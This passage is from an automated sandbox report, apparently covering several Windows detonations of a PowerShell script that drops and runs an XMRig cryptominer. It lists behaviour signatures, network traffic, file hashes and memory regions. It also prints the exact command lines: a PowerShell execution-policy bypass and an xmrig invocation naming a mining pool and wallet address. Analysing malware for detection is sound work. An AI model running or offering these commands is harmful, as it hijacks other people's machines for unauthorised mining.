| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 704 wrote to memory of 1464 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 704 wrote to memory of 1464 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/704-0-0x00007FFC95430000-0x00007FFC95456000-memory.dmp
memory/704-1-0x000002A0696F0000-0x000002A069712000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iq02oqsj.5ro.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/704-11-0x000002A0699D0000-0x000002A0699E2000-memory.dmp
memory/704-12-0x000002A0699C0000-0x000002A0699CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1464-43-0x000001EFD5ED0000-0x000001EFD5EF0000-memory.dmp
memory/1464-44-0x00007FFC95430000-0x00007FFC95456000-memory.dmp
memory/1464-45-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-46-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-47-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-48-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-49-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-50-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-51-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-52-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-53-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-54-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-55-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-56-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-57-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-58-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-59-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-60-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-61-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-62-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-63-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-64-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-65-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-66-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-67-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-68-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-69-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-70-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-71-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-72-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-73-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-74-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-75-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-76-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-77-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-78-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-79-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-80-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-81-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-82-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-83-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-84-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-85-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-86-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-87-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-88-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-89-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-90-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-91-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-92-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-93-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-94-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-95-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-96-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-97-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-98-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-99-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-100-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-101-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-102-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-103-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-104-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-105-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-106-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
memory/1464-107-0x00007FF76C300000-0x00007FF76CF33000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:09
Platform
win11-20240419-en
Max time kernel
1790s
Max time network
1792s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4232 wrote to memory of 2196 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4232 wrote to memory of 2196 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/4232-0-0x00007FF835F73000-0x00007FF835F75000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fivqlp34.zdk.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4232-9-0x0000022379260000-0x0000022379282000-memory.dmp
memory/4232-10-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/4232-11-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/4232-12-0x00007FF835F70000-0x00007FF836A32000-memory.dmp
memory/4232-14-0x0000022379760000-0x0000022379772000-memory.dmp
memory/4232-15-0x00000223792D0000-0x00000223792DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 06:42
Platform
win10-20240611-en
Max time kernel
1796s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2148 wrote to memory of 3572 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2148 wrote to memory of 3572 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
Files
memory/2148-0-0x00007FFF44693000-0x00007FFF44694000-memory.dmp
memory/2148-5-0x000001CAEC8B0000-0x000001CAEC8D2000-memory.dmp
memory/2148-8-0x00007FFF44690000-0x00007FFF4507C000-memory.dmp
memory/2148-9-0x000001CAECBE0000-0x000001CAECC56000-memory.dmp
memory/2148-10-0x00007FFF44690000-0x00007FFF4507C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l5yen52c.lvg.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2148-25-0x00007FFF44690000-0x00007FFF4507C000-memory.dmp
memory/2148-48-0x000001CAECD60000-0x000001CAECD72000-memory.dmp
memory/2148-61-0x000001CAECBA0000-0x000001CAECBAA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 06:42
Platform
win11-20240508-en
Max time kernel
1656s
Max time network
1666s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/2428-0-0x00007FFCB83B3000-0x00007FFCB83B5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_phpsuupt.3ix.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2428-9-0x00000205B9CD0000-0x00000205B9CF2000-memory.dmp
memory/2428-10-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp
memory/2428-11-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp
memory/2428-12-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp
memory/2428-13-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp
memory/2428-14-0x00007FFCB83B3000-0x00007FFCB83B5000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 06:51
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2272 wrote to memory of 768 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2272 wrote to memory of 768 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.178.89.13.in-addr.arpa | udp |
Files
memory/2272-0-0x00007FF942E73000-0x00007FF942E75000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f5metjbn.jfh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2272-1-0x0000018A62600000-0x0000018A62622000-memory.dmp
memory/2272-11-0x00007FF942E70000-0x00007FF943931000-memory.dmp
memory/2272-12-0x00007FF942E70000-0x00007FF943931000-memory.dmp
memory/2272-14-0x00007FF942E70000-0x00007FF943931000-memory.dmp
memory/2272-15-0x0000018A7B920000-0x0000018A7B932000-memory.dmp
memory/2272-16-0x0000018A7ABA0000-0x0000018A7ABAA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral18
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:00
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1786s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1260 wrote to memory of 4412 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1260 wrote to memory of 4412 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
